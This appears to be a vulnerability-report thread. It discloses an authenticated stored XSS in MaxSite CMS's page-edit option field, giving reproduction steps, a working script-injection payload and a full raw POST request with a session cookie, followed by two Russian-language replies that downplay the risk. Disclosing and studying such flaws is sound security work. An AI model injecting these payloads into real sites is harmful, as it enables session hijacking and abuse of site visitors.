Stored-Cross-Site-Scripting (XSS)(authenticated)

[4xpl0r3r]

a stored cross-site scripting (XSS) in maxsite cms targeted towards web admin through ~/admin/page_edit/4 at via the parameter f_options[mso-page-content-add-class]

poc:

• Navigate to admin page, at the page http://cms-master.com/admin/page_edit/4
• insert xss payload in the parameter f_options[mso-page-content-add-class]
• when someone open the new page ,malicious Javascript payload will execute.
• xss poc: "><style> @keyframes x{}</style><xss style="animation-name:x" onanimationend="[].map(alert('xss'))"></xss>> <b/style=position:fixed;top:0;left:0;font-size:200px>CSS<

requetst:

POST /admin/page_edit/4 HTTP/1.1
Host: cms-master.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------246745379914226729033108626353
Content-Length: 6433
Origin: http://cms-master.com
Connection: close
Referer: http://cms-master.com/admin/page_edit/4
Cookie: admin-menu=%7B%220%22%3A1%2C%221%22%3A1%2C%222%22%3A1%7D; cms-master.com-admin-files1=%7B%220%22%3A1%7D; ci_session=a%3A19%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22c3c2eeae40c8eb1874cba2d2a4499a9d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A78%3A%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A89.0%29+Gecko%2F20100101+Firefox%2F89.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1648713978%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A10%3A%22userlogged%22%3Bs%3A1%3A%221%22%3Bs%3A18%3A%22last_activity_prev%22%3Bi%3A1648713976%3Bs%3A7%3A%22comuser%22%3Bi%3A0%3Bs%3A8%3A%22users_id%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22users_nik%22%3Bs%3A5%3A%22admin%22%3Bs%3A11%3A%22users_login%22%3Bs%3A92%3A%22MSO-S5DMkA%2Ba2fEEV%2FyjtS6Hma%2FtG%2FkrmgkZpQMkgo6J4Jwm%2F%2BQ0evh5k0nxKUKxeAyo4IfESVWmmuy0wuRuFY8nkA%3D%3D%22%3Bs%3A14%3A%22users_password%22%3Bs%3A132%3A%22MSO-XCtzzQeQ0PvTtE3rvh0QRKoO5DhTMNZX5mDbcWbr7FWNWVup63AvgDI0nUi9ip9OuMRfsm3Jf6Pa%2B2X2QC%2B1cNAO3r4yA5hBf%2FzuWnHYTGxkSHwtFgtRsorvvtWC7ntm%22%3Bs%3A15%3A%22users_groups_id%22%3Bs%3A1%3A%221%22%3Bs%3A16%3A%22users_last_visit%22%3Bs%3A19%3A%222022-03-30+23%3A09%3A40%22%3Bs%3A17%3A%22users_show_smiles%22%3Bs%3A1%3A%221%22%3Bs%3A15%3A%22users_time_zone%22%3Bs%3A4%3A%227200%22%3Bs%3A14%3A%22users_language%22%3Bs%3A2%3A%22ru%22%3Bs%3A16%3A%22users_avatar_url%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22users_email%22%3Bs%3A13%3A%22admin%40123.com%22%3B%7D09e712408d50f4a764349b1c1d165dec238c79f8; mso-tabs_widget_000=4; cms-master.com-admin-files-_pages-4-mini1=%7B%220%22%3A0%7D
Upgrade-Insecure-Requests: 1

-
Content-Disposition: form-data; name="f_options[mso-page-content-add-class]"

"><style> @keyframes  x{}</style><xss style="animation-name:x" onanimationend="[].map(alert('xss'))"></xss>> <b/style=position:fixed;top:0;left:0;font-size:200px>CSS<
-----------------------------246745379914226729033108626353
Content-Disposition: form-data; name="f_submit[4]"

-----------------------------246745379914226729033108626353
Content-Disposition: form-data; name="upload_max_file_size"

20000000
-----------------------------246745379914226729033108626353
Content-Disposition: form-data; name="upload_action"

http://cms-master.com/require-maxsite/YWRtaW4vcGx1Z2lucy9hZG1pbl9wYWdlL3VwbG9hZHMtcmVxdWlyZS1tYXhzaXRlLnBocA==
-----------------------------246745379914226729033108626353
Content-Disposition: form-data; name="upload_ext"

mp3|gif|jpg|jpeg|png|svg|zip|txt|rar|doc|rtf|pdf|html|htm|css|xml|odt|avi|wmv|flv|swf|wav|xls|7z|gz|bz2|tgz

[vimruler]

Хм. Если кто-то попал в админку, то там можно уже не шибко себя ограничивать и сразу делать с сайтом что угодно, а не только xss для посетителей сайта :))

Но, в целом, интересное исследование, спасибо!

[maxsite]

Более того, эти такие мета поля как раз часто и предназнчены для того, чтобы размещать там произвольный код.